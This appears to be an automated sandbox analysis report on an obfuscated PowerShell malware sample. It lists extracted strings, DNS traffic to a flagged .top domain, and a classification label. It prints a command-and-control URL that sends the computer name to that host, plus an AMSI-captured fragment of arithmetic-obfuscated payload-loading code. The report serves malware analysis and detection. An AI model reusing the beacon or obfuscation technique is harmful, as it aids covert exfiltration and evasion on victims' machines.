Source: http://cmacnnkfbhlcncm.top | Avira URL Cloud: Label: malware |
Source: | Binary string: ion.pdbcyTk source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.41030903631.0000026E907A3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Management.Automation.pdbQ source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbOypk source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: gement.Automation.pdbnSS% source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdbo source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbq source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbj source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9 |
Source: global traffic | DNS traffic detected: DNS query: cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php? |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527 |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/9ciszeq80lhtr.php?id=computer&key=15935922840&s=527 |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/9ciszeq80lhtr.php?id=computer&key=15935922840&s=527p |
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.41065685822.0000026EAAA40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E94AEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF8D1B28B32 | 0_2_00007FF8D1B28B32 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF8D1B27D86 | 0_2_00007FF8D1B27D86 |
Source: classification engine | Classification label: mal68.evad.winPS1@2/7@2/0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drm1igxw.dvr.ps1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $049h8rxnvqfbt27.(([system.String]::new(@((235505/(16643525/4735)),(238317/(5977248/2784)),(-9346+(1827+(7527+(-5188+5292)))),(-4857+(-770+(3789+(-4097+(11413-(734+(9380-(5285027/1111)))))))),(6501-(15043-(537+8089))),(-3722+3833)))))( $sgvhtey7i8axq3r ) $049h8rxnvqfbt27.(([system.String]::new(@((279926/4178),(56484/(2982-(2132+(-7110+(10569-(-4136+(1930+(-733+(10266061/(12158290/(3350540/(4170234/8949)))))))))))),(2320-(717925/325)),(9204-9089),(-9836+9937)))))()$0lu51qr8owa9zh37ywckn3xdhbuie.(([system.String]::new(@((6297-6230),(-8043+8151),(353646/(12145032/(11016-(10521-3317)))),(-212+327),(970610/(17833-8223))))))()[byte[]] $ioj8fg7y3huk5a6 = $sgvhtey7i8axq3r.(([system.String]::new(@((-8712+(9714-918)),(629481/5671),(-6254+6319),(4095-3981),(1024860/(-1084+10074)),(10114-10017),(847847/7007)))))() $uykm374xtfghd2z=$ioj8fg7y3huk5a6 return $uykm374xtfghd2z}[System.Text.Encoding]::ascii.((-join (@((216337/(4948328/1624)),(683265/(-976+(7321+420))),(4552-4436),(-855+(4385150/4675)),(760148/6553),(-6942+(373+6683)),(8509-8404),(766590/6969),(6417-(64364916/10194)))| ForEach-Object { [char]$_ })))((nvgh3e65mupyqljs8obki24acw1 "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 |